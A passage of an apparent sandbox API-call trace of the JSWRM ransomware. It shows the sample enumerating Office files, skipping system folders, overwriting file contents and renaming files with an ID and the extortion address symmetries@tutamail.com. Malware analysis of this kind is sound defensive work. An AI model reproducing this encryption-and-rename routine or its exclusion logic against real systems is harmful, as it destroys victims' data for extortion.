(lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\DESKTOP.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\desktop.ini"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\DESKTOP.INI.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\desktop.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0113.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0113.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0113.711] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1697068, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1697068, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf16bd2da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1266, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="FOLDER.ICO", cAlternateFileName="")) returned 1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2=".") returned 1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="..") returned 1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="...") returned 1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="windows") returned -1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="recovery") returned -1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="perflogs") returned -1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="documents and settings") returned 1 [0113.711] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="$RECYCLE.BIN") returned 1 [0113.745] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="system volume information") returned -1 [0113.746] lstrcmpiW (lpString1="FOLDER.ICO", lpString2="msocache") returned -1 [0113.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDER.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDER.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOLDER.ICO", lpUsedDefaultChar=0x0) returned 10 [0113.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDER.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDER.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOLDER.ICO", lpUsedDefaultChar=0x0) returned 10 [0113.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0113.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0113.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0113.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0113.747] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4710) returned 1 [0113.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1260) returned 0x24c1d0 [0113.748] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1260, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1260, lpOverlapped=0x0) returned 1 [0113.750] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.750] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1260, lpOverlapped=0x0) returned 1 [0113.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.750] CloseHandle (hObject=0x314) returned 1 [0113.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0113.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0113.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0113.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0113.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0113.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0113.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.751] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\folder.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\FOLDER.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\folder.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0113.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0113.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0113.752] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6f141c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3a6f141c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3a6f141c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0113.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0113.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0113.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0113.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0113.753] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6f141c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3a6f141c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3a6f141c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0113.753] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0113.753] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45a7036, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45a7036, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4619706, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DBSAMPLE.MDB", cAlternateFileName="")) returned 1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2=".") returned 1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="..") returned 1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="...") returned 1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="windows") returned -1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="recovery") returned -1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="perflogs") returned -1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="documents and settings") returned -1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="$RECYCLE.BIN") returned 1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="system volume information") returned -1 [0113.753] lstrcmpiW (lpString1="DBSAMPLE.MDB", lpString2="msocache") returned -1 [0113.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBSAMPLE.MDB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBSAMPLE.MDB", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBSAMPLE.MDB", lpUsedDefaultChar=0x0) returned 12 [0113.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0113.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBSAMPLE.MDB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBSAMPLE.MDB", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBSAMPLE.MDB", lpUsedDefaultChar=0x0) returned 12 [0113.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0113.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0113.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0113.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0113.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.754] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=507904) returned 1 [0113.754] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.755] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.769] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.769] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.769] CloseHandle (hObject=0x238) returned 1 [0113.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0113.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0113.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0113.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0113.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0113.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.770] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0113.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0113.771] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3163050, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3163050, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3163050, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2a658, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DBWIZ.VSL", cAlternateFileName="")) returned 1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2=".") returned 1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="..") returned 1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="...") returned 1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="windows") returned -1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="recovery") returned -1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="perflogs") returned -1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="documents and settings") returned -1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="system volume information") returned -1 [0113.771] lstrcmpiW (lpString1="DBWIZ.VSL", lpString2="msocache") returned -1 [0113.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0113.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.VSL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.VSL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBWIZ.VSL", lpUsedDefaultChar=0x0) returned 9 [0113.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0113.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0113.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.VSL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.VSL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBWIZ.VSL", lpUsedDefaultChar=0x0) returned 9 [0113.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0113.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0113.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0113.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0113.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.773] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=173656) returned 1 [0113.773] 